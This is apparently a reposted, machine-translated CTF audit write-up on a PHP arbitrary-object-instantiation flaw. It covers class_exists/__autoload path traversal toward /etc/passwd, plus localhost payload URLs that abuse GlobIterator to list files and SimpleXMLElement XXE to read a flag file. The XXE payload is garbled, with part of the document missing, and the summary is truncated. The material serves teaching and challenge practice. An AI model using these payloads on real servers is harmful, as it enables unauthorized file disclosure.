Red sun code audit-day3 instantiation of arbitrary object vulnerability

Others 2021-03-27 22:37:00 views: null

Article Directory

Day 3 - Snow Flake

The title is called Snowflake, and the code is as follows:
Insert picture description here

Vulnerability analysis:

There are two security holes in this code. The first one is that the file contains a vulnerability. The class_exists() function is used in line 8 of the above figure to determine whether the controller passed by the user exists. By default, if the program has the __autoload function, then the class_exists() function is used. The __autoload function in this program will be automatically called, and the file containing vulnerability of this question appears in this place. Attackers can use path traversal to include any file. Of course, the premise of using path traversal symbols is between PHP5 and 5.3 (including version 5.3). For example, if the class name is: …/…/…/…/etc/passwd, the search will check the contents of the passwd file. Let’s take a look at the definition of the class_exists() function in the PHP manual:

class_exists (PHP 4, PHP 5, PHP 7)
Features Check if the class is defined
definition bool class_exists ( string $class_name[, bool $autoload = true ] )
$class_name is the name of the class It is not case sensitive when matching. By default, $autoload is true. When $autoload is true, the __autoload function in this program will be automatically loaded; when $autoload is false, the __autoload function will not be called.

Insert picture description here

There is no filtering on the incoming classes, so we can pass in the built- in classes.

Here we directly use the built-in classes of PHP, first use the GlobIterator class to search for the name of the flag file, and look at the definition of the constructor of the GlobIterator class in the >PHP manual :

public GlobIterator::__construct ( string $pattern [, int $flags = FilesystemIterator::KEY_AS_PATHNAME | FilesystemIterator::CURRENT_AS_FILEINFO ] )

The first parameter is the name of the file to be searched, the second parameter is to select which information of the file as the key name, here I choose to use FilesystemIterator::CURRENT_AS_FILEINFO, the corresponding constant value is 0, you can find these constants here Value, so the payload of the final search file is as follows:

http://localhost/CTF/index.php?name=GlobIterator&param=./*.php&param2=0

Insert picture description hereWe will find that the file name of the flag is f1agi3hEre.php. Next, we use the built-in SimpleXMLElement to read the content of the f1agi3hEre.php file. Here we need to combine the use of the PHP stream, because when the file exists: <> & ' "These 5 symbols will cause XML file parsing errors, so we use the PHP file stream here to output the content of the file to be read after base64 encoding. The specific payload is as follows:

http://localhost/CTF/index.php?name=SimpleXMLElement&param=<?xml version="1.0"?>]>%26xxe;&param2=2

to sum up

1. Custom functions are not filtered, resulting in vulnerabilities in instantiating arbitrary objects

2. Built-in function: GlobIterator

3 、 twentieth

Guess you like

Origin blog.csdn.net/qq_45951598/article/details/110825629
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com